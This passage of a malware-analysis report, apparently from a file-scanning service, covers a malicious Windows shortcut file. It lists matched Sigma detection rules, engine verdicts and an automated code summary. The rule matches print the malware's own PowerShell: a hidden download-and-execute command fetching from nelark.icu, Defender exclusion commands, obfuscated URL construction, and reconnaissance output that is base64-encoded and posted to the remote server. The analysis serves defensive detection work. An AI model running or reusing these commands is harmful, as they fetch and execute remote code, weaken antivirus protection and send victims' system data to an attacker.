"Path": "",
"ScriptBlockId": "d95ea55d-0143-47fa-8e60-f5b255db95b2",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Add-MpPreference -ExclusionPath C:\\Users\\Bruno\\AppData\\Local\\Temp",
"Path": "",
"ScriptBlockId": "93b1b26b-e625-4922-ae0f-b29343caef62",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Add-MpPreference -ExclusionPath C:\\Windows\\System32",
"Path": "",
"ScriptBlockId": "51388c04-ae72-46a6-b989-163fe84aec4b",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Add-MpPreference -ExclusionPath \"$env:windir\\System32\"",
"Path": "",
"ScriptBlockId": "ee7bd9f5-7122-41c0-b4cf-ab3068fc5221",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "d6ff8dca8c8ea9fa750972dd032542746369179e3aaceccc1c3f2cc2a35f5d25",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "PSScriptPolicyTest Creation By Uncommon Process",
"rule_description": "Detects the creation of the \"PSScriptPolicyTest\" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.",
"rule_author": "Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"TargetFilename": "%WINDIR%\\temp\\__psscriptpolicytest_ubon2t2v.wee.psm1"
}
},
{
"values": {
"TargetFilename": "%WINDIR%\\temp\\__psscriptpolicytest_0lmv11b1.p21.psm1"
}
},
{
"values": {
"TargetFilename": "%WINDIR%\\temp\\__psscriptpolicytest_5maxqsnk.22k.ps1"
}
},
{
"values": {
"TargetFilename": "%WINDIR%\\temp\\__psscriptpolicytest_q5jimyjk.2g4.ps1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "dc48d8314d305b4c97b9f813958e20738bb989b83928e70ea811bb7c0bf7e197",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell Invocations - Specific - ProcessCreation",
"rule_description": "Detects suspicious PowerShell invocation command parameters",
"rule_author": "Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"Description": "Windows Command Processor",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule",
"CommandLine": "cmd.exe /c powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\svchost.exe",
"IntegrityLevel": "System",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "cmd.exe /c powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"CommandLine": "powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "System",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "ece68c3b6fda1fe5c7d8707c5dd9099cf564ed0e7e7b480e97278c475f10e5a7",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Powershell Execute Batch Script",
"rule_description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\", \"\");\r\n\r\nfunction postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n [TRUNCATED]",
"Path": "",
"ScriptBlockId": "c34ad247-3994-44bc-a85b-233728e2943b",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "function sdu () {\r\n\t$rtet44gg = \"Ht3gjt50Kt3gjt50Lt3gjt50M:t3gjt50\\t3gjt50St3gjt50Ot3gjt50FTt3gjt50WAt3gjt50Rt3gjt50E\\Mt3gjt50ict3gjt50rost3gjt50oft3gjt50t\\Wit3gjt50ndt3gjt50owt3gjt50s\".Replace(\"t3gjt50\", \"\") + \"i3bnoie4\\i3bnoie4Cui3bnoie4ri3bnoie4rei3bnoie4ntVi3bnoie4eri3bnoie4si3bnoie4ioi3bnoie4n\\Pi3bnoie4oli3bnoie4ici3bnoie4iei3bnoie4s\\i3bnoie4Si3bnoie4ysti3bnoie4emi3bnoie4\".Replace(\"i3bnoie4\", \"\")\r\n\t$ruiibttew = \"Cy5tjogroony5tjogrosey5tjogronty5tjogroPy5tjogroroy5tjogrompy5tjogroty5tjogro\". [TRUNCATED]",
"Path": "",
"ScriptBlockId": "aa066c36-b4fc-42bc-9e1a-a8292d983389",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function persist {\r\n\tStart-Process PowerShell -Verb RunAs -WindowStyle Hidden \"Add-MpPreference -ExclusionPath $env:TEMP\"\r\n\tStart-Process PowerShell -Verb RunAs -WindowStyle Hidden \"Add-MpPreference -ExclusionPath $env:windir\\System32\"\r\n\t\r\n\t$url2 = $mainUri + \"res/post_proc.php?fpath=scheduler-once\"\r\n\t$dst2 = $env:TEMP + \"\\scheduler-once.bat\"\r\n\t$WebClient = New-Object System.Net.WebClient\t\r\n\t$WebClient.DownloadFile($url2, $dst2)\r\n\t\r\n\t$dst3 = $env:windir + \"\\System32\\sysmon2.bat\"\r\n\t$dst4 = $env:w [TRUNCATED]",
"Path": "",
"ScriptBlockId": "d95ea55d-0143-47fa-8e60-f5b255db95b2",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\", \"\");\r\n\r\nfunction postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n [TRUNCATED]",
"Path": "",
"ScriptBlockId": "5aeddb41-a6bc-40c3-94ba-2530bf8dd844",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "function sdu () {\r\n\t$rtet44gg = \"Ht3gjt50Kt3gjt50Lt3gjt50M:t3gjt50\\t3gjt50St3gjt50Ot3gjt50FTt3gjt50WAt3gjt50Rt3gjt50E\\Mt3gjt50ict3gjt50rost3gjt50oft3gjt50t\\Wit3gjt50ndt3gjt50owt3gjt50s\".Replace(\"t3gjt50\", \"\") + \"i3bnoie4\\i3bnoie4Cui3bnoie4ri3bnoie4rei3bnoie4ntVi3bnoie4eri3bnoie4si3bnoie4ioi3bnoie4n\\Pi3bnoie4oli3bnoie4ici3bnoie4iei3bnoie4s\\i3bnoie4Si3bnoie4ysti3bnoie4emi3bnoie4\".Replace(\"i3bnoie4\", \"\")\r\n\t$ruiibttew = \"Cy5tjogroony5tjogrosey5tjogronty5tjogroPy5tjogroroy5tjogrompy5tjogroty5tjogro\". [TRUNCATED]",
"Path": "",
"ScriptBlockId": "19bddaf3-24cc-4726-82f3-63e6d7e62964",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
},
{
"rule_level": "low",
"rule_id": "1c2e4db94ca79f939e94e29c04fb3b71467fc6f5b9c31db34fcce5a2fb3b856f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Non Interactive PowerShell Process Spawned",
"rule_description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "cmd.exe /c powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"CommandLine": "powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "System",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "%WINDIR%\\system32\\windowspowershell\\v1.0\\powershell.exe",
"Image": "C:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "5ef6bc365a01e6ef90c1fc4f49006e9a8fe08e82c0a9ce80c10153915771547b",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Get Local Groups Information - PowerShell",
"rule_description": "Detects the use of PowerShell modules and cmdlets to gather local group information.\nAdversaries may use local system permission groups to determine which groups exist and which users belong to a particular group such as the local administrators group.\n",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n$dkdlel = \"a\"\r\n$lognmfl = \"OneDrive.log\"\r\n$fhrmvkdlf = \"\\OneDriveLog\\\"\r\n\r\nfunction gif($fhrmvotm) #get information\r\n{\r\n\t$env:COMPUTERNAME + \"_\" + $env:USERNAME >> $fhrmvotm\r\n\r\n\t# Get-ChildItem ([Environment]::GetFolderPath(\"Recent\")) >> $fhrmvotm\r\n\tipconfig /all >> $fhrmvotm\r\n\tnet user >> $fhrmvotm\r\n\tquery user >> $fhrmvotm\r\n\t\r\n\t\"\" >> $fhrmvotm\r\n\t\"Currently logged in users:\", \"-------------------------- [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "a4d52191-f873-49f1-9b13-9fdeb4adbdac",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function gif($fhrmvotm) #get information\r\n{\r\n\t$env:COMPUTERNAME + \"_\" + $env:USERNAME >> $fhrmvotm\r\n\r\n\t# Get-ChildItem ([Environment]::GetFolderPath(\"Recent\")) >> $fhrmvotm\r\n\tipconfig /all >> $fhrmvotm\r\n\tnet user >> $fhrmvotm\r\n\tquery user >> $fhrmvotm\r\n\t\r\n\t\"\" >> $fhrmvotm\r\n\t\"Currently logged in users:\", \"---------------------------------------------\" >> $fhrmvotm\r\n\t$currentUser = Get-CimInstance -ClassName Win32_ComputerSystem | Select-Object -ExpandProperty UserName \r\n\t# $currentUser = \"$en [TRUNCATED]",
"Path": "",
"ScriptBlockId": "0b81f408-7507-4a5a-bdb3-0cb2503e17e3",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "{\r\n\t\t$groupName = $_.Name\r\n\t\t$members = Get-LocalGroupMember -Group $groupName\r\n\t\t$members | Where-Object { $_.Name -eq $currentUser } | ForEach-Object {\r\n\t\t\t$groupName\r\n\t\t}\r\n\t}",
"Path": "",
"ScriptBlockId": "92a2ecb2-81e5-4542-8dd6-4456b40947f9",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
},
{
"rule_level": "low",
"rule_id": "80e1441e8251586c742da610b4bceb4d94fbe79f4e8b64b9745b6a11da90d7c1",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "PowerShell Script With File Upload Capabilities",
"rule_description": "Detects PowerShell scripts leveraging the \"Invoke-WebRequest\" cmdlet to send data via either \"PUT\" or \"POST\" method.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n$dkdlel = \"a\"\r\n$lognmfl = \"OneDrive.log\"\r\n$fhrmvkdlf = \"\\OneDriveLog\\\"\r\n\r\nfunction gif($fhrmvotm) #get information\r\n{\r\n\t$env:COMPUTERNAME + \"_\" + $env:USERNAME >> $fhrmvotm\r\n\r\n\t# Get-ChildItem ([Environment]::GetFolderPath(\"Recent\")) >> $fhrmvotm\r\n\tipconfig /all >> $fhrmvotm\r\n\tnet user >> $fhrmvotm\r\n\tquery user >> $fhrmvotm\r\n\t\r\n\t\"\" >> $fhrmvotm\r\n\t\"Currently logged in users:\", \"-------------------------- [TRUNCATED]",
"Path": "",
"ScriptBlockId": "a4d52191-f873-49f1-9b13-9fdeb4adbdac",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function sif() {\r\n\t$fph = $env:windir + \"\\Temp\" +$fhrmvkdlf\r\n\tNew-Item -Path $fph -Type directory -Force\r\n\t$hFLgPth = $fph + $lognmfl\r\n\tgif $hFLgPth\r\n\t$hexdata =[IO.File]::readalltext($hFLgPth)\r\n\t$bytes = [System.Text.Encoding]::UTF8.GetBytes($hexdata)\r\n\t$b64 = [System.Convert]::ToBase64String($bytes)\r\n\t$udivkv = $mainUri + \"res/index.php\"\r\n\t$uid = gid\r\n\t# Invoke-WebRequest -Uri $udivkv -Method Post -Body \"uid=$uid&result=$b64\"\r\n\tpostRequest $udivkv \"uid=$uid&result=$b64\"\r\n\tRemove-Item -path $hF [TRUNCATED]",
"Path": "",
"ScriptBlockId": "4e7b0706-2a37-4037-af3a-b75aa5b5fb33",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "b0d225f3239543a37159ba2855ee1e7972c6bff3c83ce7aed9056599f6ee6314",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Process Discovery With Get-Process",
"rule_description": "Get the processes that are running on the local computer.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "\r\n$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n\r\nstart \"Screenshot_2.png\"\r\nRemove-Item \"Screenshot_1.png.lnk\" -ErrorAction SilentlyContinue\r\nCopy-Item \"Screenshot_2.png\" \"Screenshot_1.png\" \r\n\r\nfunction gid\r\n{\r\n\t$regPath = \"HKLM:\\Software\\Wireless\"\r\n\t$exist = Get-ItemProperty $regPath -Name uid -ErrorAction SilentlyContinue\r\n\tif ($null -ne $exist) {\r\n\t\t$uid = (Get-ItemProperty $regPath -Name uid).uid\r\n\t}\r\n\telse {\r\n\t\t$local = \"$env:public\\documents\\id.l [TRUNCATED]",
"Path": "",
"ScriptBlockId": "189d1f84-c320-4cb7-8fa3-715bbefca8a1",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function action {\r\n\t#Set-ExecutionPolicy -ExecutionPolicy Bypass -Force\r\n\tinstant\r\n\t$sysProc = Get-Process | Where-Object { $_.Name -eq \"powershell\" -and $_.SessionId -eq 0 }\r\n\twhile ($null -eq $sysProc) {\r\n\t\tgCommand\r\n\t\tStart-Sleep -Seconds 5\r\n\t\t$sysProc = Get-Process | Where-Object { $_.Name -eq \"powershell\" -and $_.SessionId -eq 0 }\r\n\t}\r\n}",
"Path": "",
"ScriptBlockId": "f12e231f-9aac-412a-be32-b4b73178ce41",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n\r\nfunction newDir($path) {\r\n\tif ((Test-Path $path) -eq $false ) {\r\n\t\tNew-Item -ItemType Directory -Path $path\r\n\t}\r\n}\r\n\r\nfunction gid\r\n{\r\n\t$regPath = \"HKLM:\\Software\\Wireless\"\r\n\t$exist = Get-ItemProperty $regPath -Name uid -ErrorAction SilentlyContinue\r\n\tif ($null -ne $exist) {\r\n\t\t$uid = (Get-ItemProperty $regPath -Name uid).uid\r\n\t}\r\n\telse {\r\n\t\t$local = \"$env:public\\documents\\id.log\"\r\n\t\tif (Test-Path $local) [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "b1b561d6-f30f-4c48-b9d7-b59f4e127079",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function action {\r\n\tSet-ExecutionPolicy -ExecutionPolicy Bypass -Force\r\n\tAdd-MpPreference -ExclusionPath \"$env:windir\\System32\"\r\n\t$exist = Get-Process | Where-Object { $_.Name -eq \"powershell\" -and $_.SessionId -eq 0 }\r\n\tif ($exist.Count -gt 1) {\r\n\t\treturn\r\n\t}\r\n\twhile ($true) {\r\n\t\tgCommand\r\n\t\tStart-Sleep -Seconds 5\r\n\t}\r\n}",
"Path": "",
"ScriptBlockId": "09998871-6404-48e7-98ea-8b74ad96fcf6",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "\r\n$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n\r\nstart \"Screenshot_2.png\"\r\nRemove-Item \"Screenshot_1.png.lnk\" -ErrorAction SilentlyContinue\r\nCopy-Item \"Screenshot_2.png\" \"Screenshot_1.png\" \r\n\r\nfunction gid\r\n{\r\n\t$regPath = \"HKLM:\\Software\\Wireless\"\r\n\t$exist = Get-ItemProperty $regPath -Name uid -ErrorAction SilentlyContinue\r\n\tif ($null -ne $exist) {\r\n\t\t$uid = (Get-ItemProperty $regPath -Name uid).uid\r\n\t}\r\n\telse {\r\n\t\t$local = \"$env:public\\documents\\id.l [TRUNCATED]",
"Path": "",
"ScriptBlockId": "0aa6d143-3ab3-4a7f-9b19-fa0dc39031ea",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
},
{
"rule_level": "low",
"rule_id": "c085cde9af85b182e783b8d7b42d66d3d0efe08696b4fe7946da3d5d1a2cd51e",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential PowerShell Obfuscation Using Alias Cmdlets",
"rule_description": "Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "Set-Alias -Name ncim -Value New-CimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue",
"Path": "",
"ScriptBlockId": "f3e47601-30e6-440b-95ae-5c298902c28b",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "c0ad3fd3010dc41b8f54cd4f911b4bf081d2d195b0e7548cdc60ebcee9250ad3",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell Get Current User",
"rule_description": "Detects the use of PowerShell to identify the current logged user.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n$dkdlel = \"a\"\r\n$lognmfl = \"OneDrive.log\"\r\n$fhrmvkdlf = \"\\OneDriveLog\\\"\r\n\r\nfunction gif($fhrmvotm) #get information\r\n{\r\n\t$env:COMPUTERNAME + \"_\" + $env:USERNAME >> $fhrmvotm\r\n\r\n\t# Get-ChildItem ([Environment]::GetFolderPath(\"Recent\")) >> $fhrmvotm\r\n\tipconfig /all >> $fhrmvotm\r\n\tnet user >> $fhrmvotm\r\n\tquery user >> $fhrmvotm\r\n\t\r\n\t\"\" >> $fhrmvotm\r\n\t\"Currently logged in users:\", \"-------------------------- [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "a4d52191-f873-49f1-9b13-9fdeb4adbdac",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function gif($fhrmvotm) #get information\r\n{\r\n\t$env:COMPUTERNAME + \"_\" + $env:USERNAME >> $fhrmvotm\r\n\r\n\t# Get-ChildItem ([Environment]::GetFolderPath(\"Recent\")) >> $fhrmvotm\r\n\tipconfig /all >> $fhrmvotm\r\n\tnet user >> $fhrmvotm\r\n\tquery user >> $fhrmvotm\r\n\t\r\n\t\"\" >> $fhrmvotm\r\n\t\"Currently logged in users:\", \"---------------------------------------------\" >> $fhrmvotm\r\n\t$currentUser = Get-CimInstance -ClassName Win32_ComputerSystem | Select-Object -ExpandProperty UserName \r\n\t# $currentUser = \"$en [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "0b81f408-7507-4a5a-bdb3-0cb2503e17e3",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
},
{
"rule_level": "low",
"rule_id": "ec63f6d5ea6cf1a23c7c491b28d6b350219d23a95ea95516ce0256730fb7912c",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Local Accounts Discovery",
"rule_description": "Local accounts, System Owner/User discovery using operating systems utilities",
"rule_author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community",
"match_context": [
{
"values": {
"CommandLine": "%WINDIR%\\system32\\quser.exe",
"Image": "C:\\Windows\\system32\\quser.exe",
"EventID": "1"
}
}
]
}
],
"last_analysis_stats": {
"malicious": 33,
"suspicious": 0,
"undetected": 29,
"harmless": 0,
"timeout": 0,
"confirmed-timeout": 0,
"failure": 0,
"type-unsupported": 13
},
"size": 22008,
"type_tag": "lnk",
"total_votes": {
"harmless": 0,
"malicious": 2
},
"crowdsourced_ids_stats": {
"high": 0,
"medium": 0,
"low": 4,
"info": 0
},
"crowdsourced_ai_results": [
{
"source": "palm",
"analysis": "The LNK file executes PowerShell with the window hidden to run a multi-stage command. The PowerShell script first performs data extraction from the LNK file itself: it drops and executes a decoy PDF from embedded data (offset 20KB) and achieves persistence by writing another LNK file (containing the first 10KB of the original LNK) to the user's Startup folder as 'OneDrive.lnk'. Finally, the script uses heavily obfuscated PowerShell (string substitution and concatenation) to construct and execute the command: `(New-Object Net.WebClient).DownloadString('https://nelark.icu/xftaswx/res/bb.php')`. The downloaded content is then executed using `iex` (Invoke-Expression), confirming classic downloader malware functionality.",
"category": "code_insight",
"verdict": "malicious",
"id": "17fe715f3819baa851126d52af8b70c0016bf9288b0b0ebbc3715053973739e4-file-palm"
}
]
}
}
}